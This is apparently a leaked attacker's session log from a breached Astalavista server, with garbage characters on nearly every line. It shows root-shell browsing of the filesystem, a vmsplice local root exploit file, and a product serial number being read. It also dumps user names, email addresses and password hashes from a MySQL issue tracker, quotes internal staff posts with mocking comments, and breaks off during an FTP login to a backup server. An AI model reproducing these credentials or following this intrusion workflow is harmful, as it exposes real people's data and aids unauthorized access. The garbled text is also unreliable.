( g6 ?7 G+ ]4 k- D9 r# a B8 m/ ^/ B" u+ s+ A6 g% w! U
sh-3.2# cd ..
- r: S8 l& s6 z8 @$ msh-3.2# cd com1 q$ W5 a# R6 x* v4 v; Y* S
sh-3.2# ls -la
' r; B, B/ F! [7 D' btotal 141208
1 i6 E" B: f6 R/ _drwx–x–x 10 com com 4096 Apr 28 12:40 .
! L8 b* E r/ s+ L) u) Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 `( q; h. E7 o) Fdrwx—— 2 com com 4096 Jun 4 04:04 backups8 q1 e# {" Z5 J1 K
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
! Z( n3 f x+ o, P$ F9 O0 vdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
9 Z8 o: _, v# s* p0 |) g-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
+ d$ v6 H8 H4 |% v-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
3 S `- l9 B2 t2 ?* T* F$ N-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
, B; G- v+ o& N ?# F6 z$ {-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
' X' r: |, R1 \- ~drwx–x–x 3 com com 4096 Jan 29 2008 domains% h' s( s8 S4 U
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed* @9 }/ o; D H7 Y$ g
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap) ]4 x7 @$ u- `1 U5 S
-rw——- 1 com com 69 Nov 18 2008 .lesshst/ |' i* B: s3 |% o% ~, h
drwx—— 2 com com 4096 Sep 24 2007 mail: W* j9 h6 |. a# A: p6 ?
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history: `: \4 q4 }- D7 V. ^& h
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
) @9 @/ h/ K6 h. Q' `, slrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
' @2 i2 U. u7 U9 j ~-rw-r—– 1 com mail 34 Sep 24 2007 .shadow2 ?" j% H5 V7 y9 \
drwx—— 2 com com 4096 Aug 26 2008 .ssh% J. U7 O& R$ a' l
-rwx—— 1 com com 8515 Feb 10 2008 t5 i1 ^8 ]. Y+ F+ Z
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c6 v5 X6 y' S1 m) o
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
- Z$ M! ]; z$ {* V. d( J- ^-rw-rw-r– 1 com com 617 May 20 2008 .toprc3 ]7 o0 Q0 r/ |% _* y+ j
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
9 `2 b# |2 A2 K. _-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
l; g, E% U6 f# _9 X' F ~-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
8 E& ~' z @) i4 m4 O) \( D/ N. E4 H1 p. J$ J1 f' Q7 ` @
sh-3.2# head t.c- j# |: O. G# J
/*
, K3 `6 h! K* b- ]6 `4 t* jessica_biel_naked_in_my_bed.c
* F1 e8 Q2 l' [*
0 h7 }1 C' L- }7 u2 G, I: f7 G* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.( z Y, }; g, J5 d" U4 q- b
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
0 ]* C$ Y+ m1 Z* Stejnak je to stare jak cyp a aj jakesyk rozbite.- |2 `# |0 k7 D. V7 W
*
+ r/ [' d+ y5 q; w* |% o6 g& h* Linux vmsplice Local Root Exploit
. b8 e& Q1 w; W* By qaaz1 G' P7 H6 k. v3 i! X2 h8 c
*5 ^; @' J9 G# \$ Z! G# }
& X5 w+ }% _- Q* Vsh-3.2# cd /( q% z% A& J4 i& [' W+ s/ r* b
sh-3.2# ls -la8 Y/ g I. Q6 y0 v( W
total 360
5 g- F7 v! x# s/ ~& t0 t Ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 .$ T1 S+ b% u0 r7 J
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! k: i X W( `. W-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
: @: ?' t. M# m6 R-rw——- 1 root root 10240 Jun 3 02:39 aquota.user X) A# e h: C
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db1 s6 x% y( [7 F& o0 m
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck6 i/ z; d" W6 ~: @& h: O
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
: `3 P' z: E. A1 n. D+ b) Mdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
, i8 z8 Z# H* I& [4 edrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin7 N" E, c6 L7 i2 ?
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
8 Q: l; h5 u& |" y9 a5 l. I/ t8 p* ]) |drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
J6 d) Y. u( f3 p& s, kdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
' h& y+ o! E, Ndrwxr-xr-x 14 root root 4096 Mar 11 17:56 home# b- T9 U6 v: z# K7 M$ Z' p
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf. @1 J% ?$ T- Z+ U7 C; l) b
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib% y$ H' i2 Y. l; h4 n& V4 W
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
* f. E9 R+ g/ e) R% Y, fdrwx—— 2 root root 16384 Sep 11 2007 lost+found
$ s+ P9 D; I! r$ T6 r8 }8 @drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
$ E6 D! b# o2 z4 v3 vdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc# s2 t, G3 ]9 Z J( i
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt% x" M+ I% r2 u; S( o: q
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
/ e7 N: A4 M5 J5 U1 @drwxr-xr-x 2 root root 0 Jun 3 02:43 net" e& H( _) [# G$ B7 r( C' K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt& Q/ v% N m: E' c
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc6 `3 N& @! h/ M2 ~! R) d+ q2 ~
drwxr-x— 15 root root 4096 Jun 4 08:40 root& K5 ^& k0 c$ i& v3 m: o- ^0 O
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
' B4 z$ k- T( y6 hdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux+ w" S* q4 T1 a. v
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv0 I: L; e+ t6 v6 {3 v5 m# |
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
6 e& Q& Q/ H% z1 h8 I2 `9 S3 jdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp& \# C3 c$ |: p
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
$ w* Y7 p, b! k5 W8 wdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var4 x- U6 V0 z+ ^0 r2 ]- @
4 r2 m8 Y6 }- {' w7 H( rsh-3.2# cd opt
" w* K, f; j5 Z. dsh-3.2# ls -la7 {3 t8 p1 p% |4 d+ L
total 20) B! h0 q/ {" F" d x" V( t
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
6 `( W- Z% l* z! G5 ?) ~: v2 z# _( d9 Vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ q2 N7 J. z( C# H8 `3 \) U/ h1 m
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws, g# H. N" b: c$ B
5 L9 v* a1 \, x) b- y+ G
sh-3.2# cd lsws/
) W! h. Y. W9 \; z/ K) Y$ Fsh-3.2# ls -la+ f @1 l9 g# T
total 108
9 m$ p3 W( L o, a& `' p% Ldrwxr-xr-x 15 root root 4096 Mar 20 2008 ." I0 V1 j: m7 J
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..! X t1 t% ?) _9 g# h/ l6 ?# }
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
0 ?7 V: |* R( _$ ^$ C- `drwxr-xr-x 13 root root 4096 May 29 15:10 admin9 u8 b7 x. P, Y ]+ f
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
2 |; x1 I4 R" b& \drwxr-xr-x 2 root root 4096 May 29 15:10 bin
. B0 b- F; r" D0 e/ w! k* ldrwx—— 4 apache apache 4096 Jun 3 02:43 conf
J4 g' X/ k) U9 ndrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT7 C7 } \6 `6 H/ o& Q' L# s7 a
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
! R& k0 E3 S3 P) U3 t- @4 Odrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
- k4 |% |+ B' c" p2 _drwxr-xr-x 2 root root 4096 Sep 15 2008 lib2 l2 R" S+ b+ \% Q
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
7 j j% @1 h1 J+ @% g: \' e9 V) b-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP7 M' @' p0 X/ Y1 H
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
! _/ Z# |) d) |& i! d-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP8 [* a" j' z% d+ S0 K, x, h
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs4 Q8 X1 o& p8 y9 X+ D0 A! s1 ?
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
$ ` ^6 O7 E% v: ]+ Vdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild( t0 e; m3 z0 Q. S, L7 q9 w
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
~& }1 Q+ j* I- a2 r4 s) A! }-rw-r–r– 1 root root 6 May 29 15:10 VERSION s9 v5 c* c: I/ M- s, r7 e0 A) Y
* a6 }" e; Z+ h5 Z7 I! H
sh-3.2# cd conf" X d# z% j0 R+ s7 O% T+ p+ v
sh-3.2# ls -la# s, {( O7 n1 b0 v6 q2 p8 d
total 48
( k( p3 S: O0 i7 u# G! h9 {drwx—— 4 apache apache 4096 Jun 3 02:43 .
! o+ G- `/ }/ _- \8 C" xdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..% r- t+ t% G$ `1 G- K" k
drwx—— 2 apache apache 4096 Mar 20 2008 cert
! G, F; n- j h+ | }-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml D Y$ d9 U4 x
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak0 E% i3 a- R; m1 Y4 s8 O+ n6 k- q( r6 ^
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last8 Y; ^6 _! Y# o+ V
-rw——- 1 apache apache 256 May 29 15:10 license.key
# ^- G/ h1 v2 ^* B8 h4 b; H-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
, J. a: U# W2 g* K$ G9 B-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
+ j7 z% X' \6 R; N8 N3 O. C8 t% s-rw——- 1 apache apache 20 May 29 15:10 serial.no6 H& O7 b0 ^! o, g* j) z. O* }
drwx—— 2 apache apache 4096 Mar 20 2008 templates
* u$ p3 @. k( ^3 K v3 a b/ ]4 Y7 y! J' N- ?) H y: k: S
sh-3.2# cat serial.no' x( S# r) t- J" F
IbDl-oVsO-CKqL-wVRa
7 W# ]1 L1 o; _
9 x+ N# Q% x1 zsh-3.2# mysql$ { E0 L# M4 w: J& V3 U) |
Welcome to the MySQL monitor. Commands end with ; or \g.
7 {, a9 g5 ~& v: g( _) P9 `Your MySQL connection id is 286844
, C; g- I* @2 _ C. y% s* EServer version: 5.0.45-community-log MySQL Community Edition (GPL)$ `, V1 y+ B$ A) U: n* o
9 v x% x' _$ }. I" V3 v
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( E8 W- f1 [# ]' f9 U6 [/ r Y
1 l" l$ ]8 \2 ~! Zmysql> show databases;' o2 n9 F- k' v5 S0 ~8 n
+———————–+- C2 x' h# y# ?" q, Y; g8 J& U9 `
| Database |
5 E9 K' G* |! f- I/ P, N+———————–+
% T3 ~, T1 Z e z4 L| information_schema |, O) s4 u Z) c# f; E
| astanet_ads |
* Q$ @; ~* y: S+ d9 A| astanet_mailing_lists |
& r+ s2 D) [0 m! W4 z| astanet_mediawiki |7 h1 i& ]+ I. t' o
| astanet_membersystem |
1 U, H- d: g# X7 L: ]6 r| com_contrexx |+ u9 J2 T5 { c* w8 g
| com_contrexx2 |, ~0 G, M1 a0 Z1 ]
| com_contrexx2_live |0 h% f2 v+ U9 |; E
| da_roundcube |
: ]. t5 e: ~* b4 i| dolphin |# }" Y5 ]9 D I7 N- Z! ^7 q
| ideapool |
/ ]/ V: @. ^% S1 \$ C| mysql |
% |6 T- M7 j& ~. U" S7 K8 H| test | Z( j9 c% g6 r; ` H' X7 Y
| yourmaster |; q- `* N9 N# t5 }" t
+———————–+
7 ]. T" n8 ` X4 s0 t l; x14 rows in set (0.00 sec)# V1 A% E2 A$ C
1 e% J- k( y1 r1 ~! Ymysql> use ideapool. J8 U9 t% f5 g( U
Database changed
, {6 ]( E; G; D, B5 U6 X. mmysql> show tables;
P% g6 E' T k) ]* `+———————————–+
1 f. _ x; H+ o* N3 {| Tables_in_ideapool |
4 R8 ^; o0 f* z" {7 ]: k+ x+———————————–+$ S# L/ v. w& F7 F3 d, |/ N
| eventum_columns_to_display |0 [5 T: c7 p, S& j& l- A' [
| eventum_custom_field |
4 p9 G! e2 K2 ]| eventum_custom_field_option |
! W) a I( h5 q. J% g| eventum_custom_filter | Z: a1 d+ K$ [" m0 r5 A/ W9 P; x
| eventum_customer_account_manager |
0 G+ E% w( b6 l# ]: A: C| eventum_customer_note |4 }, w W# i+ e0 L$ O/ K) g0 N B
| eventum_email_account |3 y. ]1 H( p. T8 c: U1 f* U5 ^. j$ L- L
| eventum_email_draft |& S% E m2 J" c4 E8 u# {
| eventum_email_draft_recipient |0 g* I( Q3 T5 B$ c8 r
| eventum_email_response |
6 p5 `' Q& R: C# u* \| eventum_faq |- Y1 r8 _( P* H3 W: w$ Z
| eventum_faq_support_level |
/ w# a' y$ S- C% P8 h& V| eventum_group |
, i7 b3 [7 W3 f& l| eventum_history_type |4 @- i" Z+ c% T+ j" n
| eventum_irc_notice |% O. s' ?5 r$ S8 i
| eventum_issue |, g' G2 B2 T& |' I
| eventum_issue_association |
1 O, J4 n' p& n1 S9 E! o3 n; v| eventum_issue_attachment |) c. @1 r4 c6 z+ z
| eventum_issue_attachment_file |0 j+ ?# B+ I2 N+ ]
| eventum_issue_checkin |# T/ S5 Y( P. y# ?9 F
| eventum_issue_custom_field |! X+ E+ e1 K/ a, u+ ~ L) m
| eventum_issue_history |
" a+ m- r: r; z. m3 O| eventum_issue_quarantine |
6 C. h6 @. Z( P( t2 }' p5 m% x| eventum_issue_requirement | ~, b: m0 B/ Z/ D, U0 C& s; k
| eventum_issue_user |# C' W5 l- j" s+ J
| eventum_issue_user_replier |% w8 d. J# c2 W4 c; F1 U
| eventum_link_filter |
/ r+ M( f- z. i, Z4 w% x| eventum_mail_queue |
5 g4 ?$ D5 Q: V. o' a D4 _) b| eventum_mail_queue_log |
w( v- F2 r2 c9 || eventum_news |- ~1 H7 K) G+ w2 o2 ^6 }
| eventum_note |, o/ g; `* _8 ] y
| eventum_phone_support |6 L! c: ?! k. W
| eventum_project |
+ }9 X, e0 i( M, T d5 `6 g+ {& {| eventum_project_category |
; q7 N, }+ m# o* T0 X& [4 _| eventum_project_custom_field |" F. x2 S7 o0 h. p
| eventum_project_email_response |
6 J: V$ X) B5 q7 U; W0 C| eventum_project_field_display |! N: F4 |. h u6 }
| eventum_project_group |
/ M8 a1 F% g5 B. L| eventum_project_link_filter |9 E$ Q) O% ^. i7 _. L7 Y9 Q
| eventum_project_news |
8 {: z$ V, u" ?+ b| eventum_project_phone_category |
8 D; T' }+ `! r; e! B% g| eventum_project_priority |
$ t1 K4 _4 l5 k5 M q3 z! _| eventum_project_release |
" E0 H$ f2 S1 Y( f, D# J| eventum_project_round_robin |( D% x A! o; p0 H0 j7 T, q; [
| eventum_project_status |6 g# V0 Z1 j ~1 w
| eventum_project_status_date |; F$ A% ?7 d4 [$ n. L3 l& @
| eventum_project_user |
% G8 r S t, W0 v| eventum_reminder_action |& }5 Q `& l2 V. K& g
| eventum_reminder_action_list |
7 ?) F" {6 x6 M0 i2 f3 C! N2 n* B| eventum_reminder_action_type |- d! z! S' X. c% j# [% n
| eventum_reminder_field |
- m' i$ W4 @' S| eventum_reminder_history |5 H5 [ b3 ^, J2 l! V
| eventum_reminder_level |" w. n" K& o o9 I% h1 ~# X% X
| eventum_reminder_level_condition |
8 W. e3 }) \! ^0 y' a| eventum_reminder_operator |5 n. x4 b! H+ x1 Z
| eventum_reminder_priority |; B- l$ D* h- k
| eventum_reminder_requirement |. U6 o4 |- a3 L0 }% K2 G' N( I
| eventum_reminder_triggered_action |4 [. s1 w$ } a$ O) t
| eventum_resolution |( J u( R- n1 d. i! \9 c
| eventum_round_robin_user |/ ]; x5 ]- w7 M" [3 K
| eventum_search_profile |
' F, ~6 O. _7 V| eventum_status |8 s0 h* t0 u/ R& E, U/ @
| eventum_subscription |+ K4 O; h& {# }* T0 j! P) I0 R C8 O9 n
| eventum_subscription_type |; i) y5 C M; c/ g1 X- I# g8 y/ H
| eventum_support_email |
: N" K( F% D8 G; ~) u( ^7 y7 ~| eventum_support_email_body |: M4 g# F! }! w) ~9 ?' ~
| eventum_time_tracking |
8 J4 C- v# m# d; k/ A$ z+ ~| eventum_time_tracking_category |
" Q2 _ f8 F: \' n7 S| eventum_user |
! k. C6 Q9 h. f! f+———————————–+3 F) q( l/ F6 ~
69 rows in set (0.00 sec)
- o- g* H, }1 w
" M) p/ b g7 ~2 y0 X/ kmysql> describe eventum_user;( M4 [6 s0 h* z) j2 j% ^
+————————-+——————+——+—–+———————+—————-+
7 U) t# o- F7 x( }" F6 J+ `( U y| Field | Type | Null | Key | Default | Extra |
+ b3 ~ [7 h ?: z7 X: \- H+————————-+——————+——+—–+———————+—————-+& B, } N3 u& k- W. W/ J2 N
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
& m0 _% L" m! P. L7 j| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
7 A6 {& ]3 k1 n4 f+ ]| usr_customer_id | int(11) unsigned | YES | | NULL | |
$ X( v: J4 V3 H) q| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
6 @0 g9 l' H2 V$ ?% V9 e2 y' ?$ Y| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |1 N% Y. h. b3 Q ^2 P0 K
| usr_status | varchar(8) | NO | | active | |
& N2 S; p! \5 \. R2 J. t8 ~, h| usr_password | varchar(32) | NO | | | |
8 P8 ?" c4 j e- H5 @& `/ || usr_full_name | varchar(255) | NO | | | |
. h4 }4 p2 V* j5 A| usr_email | varchar(255) | NO | UNI | | |) L: v2 [8 T. g: `3 S* C
| usr_preferences | longtext | YES | | NULL | |5 H6 t* p4 C8 s8 `: @
| usr_sms_email | varchar(255) | YES | | NULL | |
/ k" Z. d/ K0 Z: n! m| usr_clocked_in | tinyint(1) | YES | | 0 | |
: c- Y" p6 z+ ~$ P| usr_lang | varchar(5) | YES | | NULL | |
- G5 {% A! \6 J2 ]% p* J% D4 U+————————-+——————+——+—–+———————+—————-+
% f: h5 C/ M. ]4 A" |* D# ]6 e13 rows in set (0.00 sec)
, G* e3 [. x% o9 h# Y# A+ d
& O: W+ d& h# {7 Wmysql> select usr_full_name,usr_email,usr_password from eventum_user;
8 @) M, O L3 Y$ }0 t+———————-+——————————-+———————————-+
. t2 L. x: K/ z6 R% M( P5 s| usr_full_name | usr_email | usr_password |5 }( V0 j& F: l/ A4 K! |3 n
+———————-+——————————-+———————————-+1 l5 u1 L& d# z
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
0 O2 ]" f: M# w5 i& @1 O( H| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
4 I( D7 N6 Q2 D2 m| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |) k8 Y" F" Q6 I3 a, l
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |3 w6 i7 E8 i7 Q s! H3 Z1 c4 u
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |1 Q9 L: M) [: j/ i/ O v' k% S
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
C* R/ g5 ?; C O/ b| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
d' z( I! l2 T6 Q6 _* W7 {| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
* P3 W1 f0 u- @3 \ _| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |2 X4 x: j$ ~0 `* s
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
: Z3 U5 b, T6 p| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |; q. ~9 t) g6 [# |3 w+ A6 q
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |. R; R6 \5 @2 r9 H
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |1 L! B; D; G _# e
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |% G% S5 q1 W$ {* y
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
" {, U0 a/ }* p& f9 K0 j2 {; [1 i+———————-+——————————-+———————————-+0 o1 `7 R: q4 P6 ]
15 rows in set (0.00 sec)0 `4 x- ^4 X4 `
- T- e1 n, I; Qmysql> select iss_description from eventum_issue where iss_id = 43;5 @9 H; c, Z1 J4 M- d
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% \9 X3 s3 K! i/ z| iss_description
" v& y9 B! |9 \9 s( X" `|
4 @" J9 V: n" ]; x: {( V, A+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+# ^6 d. E6 A1 i
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
, t5 ~; Q8 Q2 t+ x/ R. uconnected for 90 mins… 120mins… so what i propose is something like:
% V, P, D. |+ R+ r) Q链接标记[url]http://www.surfthechannel.com/[/url]
% Y2 l& M }. {# \3 Z& w5 isince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
' a, n, y3 z4 Z7 f0 `7 s0 dlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
8 L5 W8 F5 X7 X/ s. X: j7 Tbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off$ ^7 x( y4 K' w' W
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
' e+ n. [, \; C1 D# ^' y/ R$ F1 O0 y
We could also put advertisement during play on the flash video player itself… extra $$…
, P0 B8 W$ u: b
- i# N/ G7 K, _/ eBy sykadul |
5 Y) G, `5 X. z% K% {, t0 }- u% }6 m+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* n0 [6 U) ^) l6 j' K
1 row in set (0.00 sec)# l' O! c; V+ v5 `0 e# A
% z7 {' o; u9 D2 o! u, V
// Money and extra $$ is all they care about. remember that.
! @ N* d: m+ m+ r+ X
+ t. {0 J& ~: Amysql> select iss_summary,iss_description from eventum_issue where iss_id =42;, B& y2 F( ]7 [
+————————+——————————————————————————————————————————————————————————————————————————————-+7 h( l" _, c- h3 b
| iss_summary | iss_description
/ P' Z. i$ }- B|' W; U4 }7 e* {5 U' I0 a( W
+————————+——————————————————————————————————————————————————————————————————————————————-+
3 z, A/ I) ~/ d) p0 H/ s) K) I! T| Forum for REAL EXPERTS | Hello,
2 Y; K+ }* m1 Z w) _# ]- @4 `( x2 W+ c' F. Y& U' _; x
Ishtus and I,
/ e% ]- X( [4 A# ^$ u- _0 Z. F7 B- D5 H _3 T& K
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide* T$ i3 N" y' Q" p
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
4 r; C2 P! U0 V2 _3 O8 r3 T6 X R5 X2 ?7 {! V& w
One example a friend of mine from coresecurity.com!
) H4 \. F5 h4 s, B, ^- C' t& K2 [4 @
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..; h7 U& G- ~/ s2 s' A
- D/ q% M$ s9 o/ e$ n
|& F8 o2 @- ]6 D# U
+————————+——————————————————————————————————————————————————————————————————————————————+: B5 i3 e: l" G2 d+ b. F# W
1 row in set (0.00 sec)
6 @0 U% Q9 `9 n, w' Q+ B m
; N$ S& p* |( |6 E+ N+ y- o// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
$ R- U4 Q6 n1 |2 R4 L0 t0 ]% P& r* T
! f% I. ~6 S3 T: H hmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;& r) A7 Q& ^* B" ^/ U( g
+——————+———————————————————————————————+
! g* x q$ I! a6 A| iss_summary | iss_description |
) t6 ?& O8 q" Z; l! P7 M! y5 N+——————+———————————————————————————————+
/ F2 `( `& F: Z& z, i8 s| Website guidance | Virtual Girl which guides you trought the website.
0 P+ @$ C- \' C( c" E. v' q5 q
: P* X/ R( A7 q+ K! S" ^We need a girl with who you can ( talk )!!!7 n9 }2 }: a, n) M5 P g
Also for the News!. W+ y7 a( O6 p! q9 Q4 q. L
So my suggestion is a girl who read you the news loud if you like!/ a4 R; o+ t/ N0 A2 Z6 M
you can choose between read yourselfe or she read it for you or both!: U/ K* U( ^7 L1 b* q" |
* A' Q' W* g- b* f) E lGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!% B/ \% f1 A8 G* m
) \ r5 G A; h1 tHave a look on the example girls!!
! g4 Z3 Q1 G/ ]6 _+ W6 p- M/ }5 ~3 l7 s- |# e% w6 p8 V
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]4 M* N$ K2 [1 B) G+ {5 \
6 D( [; |/ n( X* \2 L) U
or that
4 R5 l+ m7 R; {% `6 `4 g5 H. L( H' ?( S
链接标记[url]http://www.yellostrom.de/[/url]
8 g" ~/ T& s% Z9 [; m/ x3 w" e5 Z5 `' h
|. Y) {6 M/ R4 i1 z" J
+——————+———————————————————————————————+1 ]) V' t0 c) R. r
1 row in set (0.00 sec), w8 t( t( Q3 X- F
9 H( D6 A4 B( b. r; o// ha ha.
6 N* v, J b0 N
, y' w! l- X" N# ~mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
. }) _+ T/ L, F+ U* m+————————–+———————————————————————————————————–+5 o X0 \+ n: p+ M* _
| iss_summary | iss_description |2 u. r) ^9 [' X6 Y4 b. C! r
+————————–+———————————————————————————————————–+
5 \! B, F* x0 x1 n2 P# h| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |3 j6 T' u3 J! Q8 b8 d
+————————–+———————————————————————————————————–+
% Y3 s8 z9 h1 L1 row in set (0.00 sec)# E; p1 J7 @/ J0 f+ [) m9 x
. D$ ?; N- B2 I3 v$ W' @9 |/ Q2 I* {// LOL.1 K) k( W8 g0 v
8 X2 c0 E u) Xmysql> exit& |: b; A& C; c3 @! t4 f( d0 p
Bye
, I' X2 v' `0 c4 Y8 |8 d/ @9 y- d1 u' V. M) G6 Y7 e; o3 z" `
sh-3.2# ftp 212.254.194.1632 N4 I$ ?& g+ A7 ]! {
Connected to 212.254.194.163.
% F }# z" i, a220 BackupCOM_VW FTP server ready.
" f5 }4 Y. u* w! m504 AUTH: security mechanism ‘GSSAPI’ not supported.6 F& ]" d- X7 h% B5 Q: U# H
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
1 {/ H# k' d8 U R: q2 QKERBEROS_V4 rejected as an authentication type
6 I$ n+ b s( TName (212.254.194.163:root): astalavista.com
( X C0 g: D8 G3 l331 Password required for astalavista.com.
' |; u' h4 a6 y$ O' O9 u5 ^7 F1 _Password:
$ {4 [& j( }4 W, B z4 [% m+ }230 User astalavista.com logged in.
/ t( h3 j5 F6 ~2 kRemote system type is UNIX.
; b2 G/ |" y7 x/ ^; VUsing binary mode to transfer files.& c* N" y0 e; B/ M
ftp> ls -la
# Q8 r6 ~3 r$ v9 G" t5 ?7 [/ Z227 Entering Passive Mode (212,254,194,163,2,188)$ w9 y# B. i2 r: v$ r+ j: W
150 Opening BINARY mode data connection for ‘file list’.
8 P: ~ [6 a8 Z8 s6 Udr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
- z0 G5 h2 B- D! Q% W226 Transfer complete.# C; l+ B: n% u5 [( A* n( r0 W
ftp> cd astalavista.com
/ z$ y! l& l- R3 h( r4 \) Q250 CWD command successful.1 t; `' L" J6 e( m8 \' `; _; R
ftp> ls -la& X; U X' D1 C, n
227 Entering Passive Mode (212,254,194,163,2,189)
& Q- \3 @! |: x e150 Opening BINARY mode data connection for ‘file list’.
